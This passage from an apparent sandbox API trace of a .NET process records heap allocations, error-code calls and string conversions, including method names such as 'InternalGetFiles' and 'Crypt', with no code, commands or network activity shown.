(HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e290 [0085.298] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d8a0 [0085.298] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7da20 [0085.298] GetLastError () returned 0xcb [0085.298] SetLastError (dwErrCode=0xcb) [0085.298] GetLastError () returned 0xcb [0085.298] SetLastError (dwErrCode=0xcb) [0085.299] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e080 [0085.300] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ddb0 [0085.300] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7db40 [0085.300] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e1a0 [0085.301] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dea0 [0085.301] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7df60 [0085.301] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7da80 [0085.301] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dd80 [0085.301] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7df00 [0085.302] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dde0 [0085.302] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d750 [0085.302] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d960 [0085.302] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e200 [0085.303] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d7b0 [0085.303] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d6c0 [0085.303] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dcf0 [0085.304] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d810 [0085.304] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dc30 [0085.304] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dcc0 [0085.304] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d8d0 [0085.304] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e0b0 [0085.305] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e230 [0085.305] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d720 [0085.305] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dd20 [0085.305] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7db70 [0085.306] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e0e0 [0085.306] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dba0 [0085.306] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d990 [0085.306] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ded0 [0085.306] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d7e0 [0085.306] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dd50 [0085.306] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d900 [0085.307] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d9c0 [0085.307] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7de10 [0085.307] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7df30 [0085.307] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7de40 [0085.307] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7df90 [0085.307] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dfc0 [0085.307] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dff0 [0085.308] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d9f0 [0085.308] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7de70 [0085.314] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7da50 [0085.314] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dab0 [0085.314] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dae0 [0085.314] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e140 [0085.315] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e020 [0085.315] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e050 [0085.315] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dc60 [0085.315] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dc90 [0085.315] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7db10 [0085.315] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e110 [0085.315] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dbd0 [0085.315] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e260 [0085.315] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7dc00 [0085.316] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e890 [0085.316] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7eb30 [0085.320] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a2f700, cbMultiByte=17, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0085.320] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a2f700, cbMultiByte=17, lpWideCharStr=0x4c1ec75f58, cchWideChar=17 | out: lpWideCharStr="InternalGetFiles") returned 17 [0085.320] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a7e860, cbMultiByte=40, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0085.320] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a7e860, cbMultiByte=40, lpWideCharStr=0x4c1ec75f58, cchWideChar=40 | out: lpWideCharStr="(System.String, System.IO.SearchOption)") returned 40 [0085.320] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7e860 | out: hHeap=0x22b349a0000) returned 1 [0085.320] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349e5ab0 | out: hHeap=0x22b349a0000) returned 1 [0085.320] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a2f700 | out: hHeap=0x22b349a0000) returned 1 [0085.321] GetLastError () returned 0xcb [0085.321] SetLastError (dwErrCode=0xcb) [0085.321] GetLastError () returned 0xcb [0085.321] SetLastError (dwErrCode=0xcb) [0085.325] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b349f4bf0, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0085.326] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b349f4bf0, cbMultiByte=6, lpWideCharStr=0x4c1ec75f58, cchWideChar=6 | out: lpWideCharStr="Crypt") returned 6 [0085.326] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a41990, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0085.326] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a41990, cbMultiByte=65, lpWideCharStr=0x4c1ec75f58, cchWideChar=65 | out: lpWideCharStr="(System.String[], System.String[], System.String, System.String)") returned 65 [0085.326] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a41990 | out: hHeap=0x22b349a0000) returned 1 [0085.326] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349e5230 | out: hHeap=0x22b349a0000) returned 1 [0085.326] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349f4bf0 | out: hHeap=0x22b349a0000) returned 1 [0085.326] GetLastError () returned 0xcb [0085.326] SetLastError (dwErrCode=0xcb) [0085.326] GetLastError () returned 0xcb [0085.326] SetLastError (dwErrCode=0xcb) [0085.327] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b349f4ce0, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0085.327] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b349f4ce0, cbMultiByte=5, lpWideCharStr=0x4c1ec75f58, cchWideChar=5 | out: lpWideCharStr="Main") returned 5 [0085.327] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a2fb20, cbMultiByte=18, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0085.327] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a2fb20, cbMultiByte=18, lpWideCharStr=0x4c1ec75f58, cchWideChar=18 | out: lpWideCharStr="(System.String[])") returned 18 [0085.327] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a2fb20 | out: hHeap=0x22b349a0000) returned 1 [0085.327] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349e5890 | out: hHeap=0x22b349a0000) returned 1 [0085.327] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349f4ce0 | out: hHeap=0x22b349a0000) returned 1 [0085.328] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x28) returned 0x22b34a7f850 [0085.329] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7f190 [0085.329] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fa60 [0085.329] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7f7f0 [0085.329] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ef20 [0085.329] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7f3a0 [0085.329] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7f820 [0085.330] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7f8b0 [0085.330] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7f2e0 [0085.330] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7f460 [0085.330] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7f2b0 [0085.330] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7f490 [0085.331] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7f940 [0085.331] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ffd0 [0085.331] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fc40 [0085.332] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80630 [0085.332] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80300 [0085.332] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80150 [0085.333] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80120 [0085.333] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80330 [0085.333] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80660 [0085.334] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fe80 [0085.334] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fbb0 [0085.334] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a800f0 [0085.334] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a802a0 [0085.334] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80240 [0085.335] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80180 [0085.335] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80210 [0085.335] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80540 [0085.335] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a801e0 [0085.336] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ff10 [0085.336] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a805d0 [0085.336] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fac0 [0085.336] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80360 [0085.337] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fca0 [0085.337] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80000 [0085.337] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a801b0 [0085.337] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80480 [0085.337] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80570 [0085.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80270 [0085.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fb20 [0085.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ff70 [0085.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fc70 [0085.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80090 [0085.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7faf0 [0085.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fdc0 [0085.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fcd0 [0085.339] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fb50 [0085.339] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7feb0 [0085.339] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a804b0 [0085.339] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a802d0 [0085.339] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80390 [0085.340] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fdf0 [0085.340] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a803c0 [0085.340] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80600 [0085.340] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a803f0 [0085.340] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80420 [0085.340] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fd90 [0085.340] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fb80 [0085.340] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fe20 [0085.341] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80510 [0085.341] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fe50 [0085.341] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fd00 [0085.341] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80450 [0085.341] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a804e0 [0085.341] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a805a0 [0085.341] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fbe0 [0085.341] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fd30 [0085.342] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fc10 [0085.342] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80690 [0085.342] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fee0 [0085.342] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7fd60 [0085.342] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ff40 [0085.342] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ffa0 [0085.342] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80030 [0085.342] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80060 [0085.343] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a800c0 [0085.343] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80a20 [0085.343] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81080 [0085.343] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80db0 [0085.343] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80b40 [0085.343] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81170 [0085.343] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80ea0 [0085.343] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80f60 [0085.344] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80a80 [0085.344] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80d80 [0085.344] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80f00 [0085.344] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80de0 [0085.344] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80750 [0085.344] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80930 [0085.344] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a811d0 [0085.344] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a807b0 [0085.345] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81290 [0085.345] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80cf0 [0085.345] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80810 [0085.345] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80c30 [0085.345] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80cc0 [0085.345] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a808a0 [0085.345] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a810b0 [0085.345] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a811a0 [0085.346] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80720 [0085.346] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80d20 [0085.346] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80b70 [0085.346] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a810e0 [0085.346] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80ba0 [0085.347] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80960 [0085.347] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80ed0 [0085.347] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80780 [0085.348] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80d50 [0085.348] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a807e0 [0085.348] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80900 [0085.348] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80e10 [0085.349] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80f30 [0085.349] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80e40 [0085.349] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80f90 [0085.349] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80fc0 [0085.350] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80ff0 [0085.350] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80990 [0085.350] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80e70 [0085.350] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a809f0 [0085.351] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a806c0 [0085.351] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a809c0 [0085.351] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81140 [0085.351] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81020 [0085.352] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81050 [0085.352] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80c60 [0085.352] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80c90 [0085.352] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80a50 [0085.352] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81110 [0085.353] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a806f0 [0085.353] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81200 [0085.353] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81230 [0085.353] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81260 [0085.354] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80840 [0085.354] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80ab0 [0085.354] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80ae0 [0085.354] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1460) returned 0x22b36a696c0 [0085.378] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.378] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.378] GetLastError () returned 0xcb [0085.378] SetLastError (dwErrCode=0xcb) [0085.378] GetLastError () returned 0xcb [0085.378] SetLastError (dwErrCode=0xcb) [0085.379] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.379] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a421a0 [0085.379] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a426a0 [0085.380] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a426a0 | out: hHeap=0x22b349a0000) returned 1 [0085.380] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42e60 [0085.381] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80870 [0085.381] HeapFree (in: 